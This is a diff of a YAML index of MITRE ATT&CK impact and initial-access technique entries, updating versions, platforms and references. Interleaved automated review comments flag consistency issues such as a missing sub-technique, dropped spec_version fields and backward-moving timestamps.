- kill_chain_name: mitre-attack
phase_name: impact
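Review bot: the rewritten T1496 description in this hunk now lists four forms of Resource Hijacking, including `Generate SMS traffic for profit`, but this diff only adds T1496.001, T1496.002 and T1496.004; the sub-technique covering SMS traffic is not visible anywhere in the patch. Please confirm it is added elsewhere in the changeset, otherwise the parent description refers to a sub-technique the index does not carry. The version bump `'1.5'` to `'2.0'` in the next hunk is consistent with the description being replaced wholesale.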
@@ -57852,7 +58813,7 @@ impact:
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Consider monitoring process resource usage to determine anomalous
activity associated with malicious hijacking of computer resources such as
@@ -57869,8 +58830,11 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.5'
+ - SaaS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- 'File: File Creation'
@@ -57889,99 +58853,73 @@ impact:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1496
external_id: T1496
- - source_name: Unit 42 Hildegard Malware
- description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
- Malware Targeting Kubernetes. Retrieved April 5, 2021.'
- url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- - source_name: CloudSploit - Unused AWS Regions
- description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
- Retrieved October 8, 2019.
- url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
- - source_name: Sysdig Proxyjacking
- description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
- Chat. Retrieved July 6, 2023.
- url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
- - source_name: Kaspersky Lazarus Under The Hood Blog 2017
- description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
- 17, 2019.
- url: https://securelist.com/lazarus-under-the-hood/77908/
- - source_name: Trend Micro Exposed Docker APIs
- description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
- via Exposed APIs. Retrieved April 6, 2021.
- url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
- - source_name: Trend Micro War of Crypto Miners
- description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
- Miners: A Battle for Resources. Retrieved April 6, 2021.'
- url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
- - source_name: GoBotKR
- description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
- Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
- url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ - source_name: Sysdig Cryptojacking Proxyjacking 2023
+ description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+ and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1496
atomic_tests: []
T1565.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
- created: '2020-03-02T14:27:00.693Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1565.002
- url: https://attack.mitre.org/techniques/T1565/002
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- - source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
- description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:33:33.983Z'
+ name: Transmitted Data Manipulation
description: |-
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Transmitted Data Manipulation
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Integrity
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+ created: '2020-03-02T14:27:00.693Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/002
+ external_id: T1565.002
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1485:
technique:
- modified: '2023-10-03T17:30:32.192Z'
+ modified: '2024-09-25T20:46:14.641Z'
name: Data Destruction
description: |-
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del
and rm
often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
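Review bot: the removed `- spec_version: '2.1'` line in this hunk (and the same removal repeated for every technique object further down) drops a property that STIX 2.1 requires on every domain object, while the objects keep their STIX `type`, `id`, `created` and `created_by_ref` fields. Any downstream step that feeds these `technique` blocks back into a STIX parser or validator will now reject them. If this is the output of a regenerated import, a short line in the commit message saying that `spec_version` is intentionally omitted would save the next reader the question; otherwise keep the property alongside the bumped `x_mitre_attack_spec_version: 3.2.0`.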
@@ -57990,7 +58928,7 @@ impact:
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
- In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+ In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58016,9 +58954,10 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Snapshot: Snapshot Deletion'
+ - 'Cloud Storage: Cloud Storage Modification'
- 'Process: Process Creation'
- 'File: File Deletion'
- 'Image: Image Deletion'
@@ -58074,55 +59013,11 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1485
atomic_tests: []
T1498:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- - Containers
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Yossi Weizman, Azure Defender Research Team
- - Vishwas Manral, McAfee
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
- type: attack-pattern
- created: '2019-04-17T20:23:15.105Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1498
- url: https://attack.mitre.org/techniques/T1498
- - source_name: FireEye OpPoisonedHandover February 2016
- url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
- description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
- 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
- Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
- - source_name: FSISAC FraudNetDoS September 2012
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
- Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- - source_name: Symantec DDoS October 2014
- url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
- description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
- Retrieved April 24, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T16:01:00.510Z'
name: Network Denial of Service
description: |-
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58137,6 +59032,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_contributors:
+ - Yossi Weizman, Azure Defender Research Team
+ - Vishwas Manral, McAfee
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -58149,16 +59048,52 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
x_mitre_impact_type:
- Availability
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+ created: '2019-04-17T20:23:15.105Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1498
+ external_id: T1498
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: FSISAC FraudNetDoS September 2012
+ description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+ Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ - source_name: FireEye OpPoisonedHandover February 2016
+ description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+ 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+ Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+ url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+ - source_name: Symantec DDoS October 2014
+ description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+ Retrieved April 24, 2019.
+ url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1495:
technique:
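Review bot: the T1498 platform list changes more than the other techniques in this diff. The removed block listed Azure AD, Office 365, SaaS and Google Workspace, and the re-added `x_mitre_platforms` carries only Windows, IaaS, Linux, macOS and Containers: SaaS is gone and there is no Identity Provider or Office Suite entry, whereas every other technique touched here swaps Azure AD / Office 365 / Google Workspace for those two new names. Please confirm this matches the upstream object rather than a truncated import; the `x_mitre_version` bump from '1.1' to '1.2' suggests a deliberate upstream edit, so a pointer to its changelog would settle it.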
@@ -58226,11 +59161,10 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1490:
technique:
- modified: '2024-04-12T02:30:08.379Z'
+ modified: '2024-09-24T13:27:31.881Z'
name: Inhibit System Recovery
description: |-
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -58248,7 +59182,7 @@ impact:
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
- Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+ Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58275,7 +59209,7 @@ impact:
- Network
- IaaS
- Containers
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -58325,13 +59259,12 @@ impact:
url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
- source_name: disable_notif_synology_ransom
description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
- servers before ransom. Retrieved October 19, 2022.
- url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+ servers before ransom. Retrieved September 12, 2024.
+ url: https://x.com/TheDFIRReport/status/1498657590259109894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1490
atomic_tests: []
T1561.001:
@@ -58399,11 +59332,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1529:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T20:45:22.531Z'
name: System Shutdown/Reboot
description: |-
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
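Review bot: the `modified` timestamp for T1529 moves backwards here, from '2023-05-09T14:00:00.188Z' to '2023-03-22T20:45:22.531Z', and the same regression appears later for T1133 ('2023-05-09' to '2023-03-30') and T1195.003 ('2022-05-24' to '2022-04-28'). Every other technique in this diff moves forward to a 2024 date. A `modified` value that goes back in time usually means the previous import came from a different source bundle than this one, so please confirm which ATT&CK release the regeneration pulled from and that these three objects are not stale copies.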
@@ -58468,13 +59400,12 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1529
atomic_tests: []
initial-access:
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -58552,7 +59483,6 @@ initial-access:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1195.001:
@@ -58602,11 +59532,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566.002:
technique:
- modified: '2024-04-15T23:51:25.037Z'
+ modified: '2024-10-15T16:06:32.591Z'
name: 'Phishing: Spearphishing Link'
description: |-
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -58645,10 +59574,10 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '2.6'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
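Review bot: the platform strings 'Office 365' and 'Google Workspace' are replaced by 'Identity Provider' and 'Office Suite' here (and likewise for T1078.001, T1199 and T1566 below). Anything in this repository that selects techniques by the old platform names, for example a per-platform index generator, will now match an empty set for those platforms without raising an error. Please check that those selectors were updated in the same change, and consider noting the rename in the commit message since it silently changes which techniques fall under each platform.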
@@ -58665,7 +59594,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: CISA IDN ST05-016
description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -58704,12 +59633,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.002
atomic_tests: []
T1566.001:
technique:
- modified: '2024-01-31T14:09:27.066Z'
+ modified: '2024-10-15T16:42:01.552Z'
name: 'Phishing: Spearphishing Attachment'
description: "Adversaries may send spearphishing emails with a malicious attachment
in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -58771,7 +59699,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Unit 42 DarkHydrus July 2018
description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
Targets Middle East Government. Retrieved August 2, 2018.
@@ -58788,7 +59716,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.001
atomic_tests: []
T1195.003:
@@ -58818,7 +59745,7 @@ initial-access:
the adversary a high degree of control over the system. Hardware backdoors
may be inserted into various devices, such as servers, workstations, network
infrastructure, or peripherals.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:05:10.755Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Hardware Supply Chain
x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -58832,7 +59759,6 @@ initial-access:
- 'Sensor Health: Host Status'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1091:
technique:
@@ -58895,12 +59821,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1195:
technique:
- modified: '2024-02-26T14:23:37.009Z'
+ modified: '2024-10-04T11:17:00.778Z'
name: Supply Chain Compromise
description: "Adversaries may manipulate products or product delivery mechanisms
prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -58975,7 +59900,7 @@ initial-access:
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
- url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
- source_name: Trendmicro NPM Compromise
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -58989,19 +59914,18 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1195
atomic_tests: []
T1190:
technique:
- modified: '2023-11-28T21:27:35.373Z'
+ modified: '2024-09-24T14:33:53.433Z'
name: Exploit Public-Facing Application
description: |-
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
- Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+ Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
- If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+ If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
@@ -59027,7 +59951,7 @@ initial-access:
- Linux
- macOS
- Containers
- x_mitre_version: '2.5'
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -59082,7 +60006,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1659:
technique:
@@ -59145,11 +60068,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
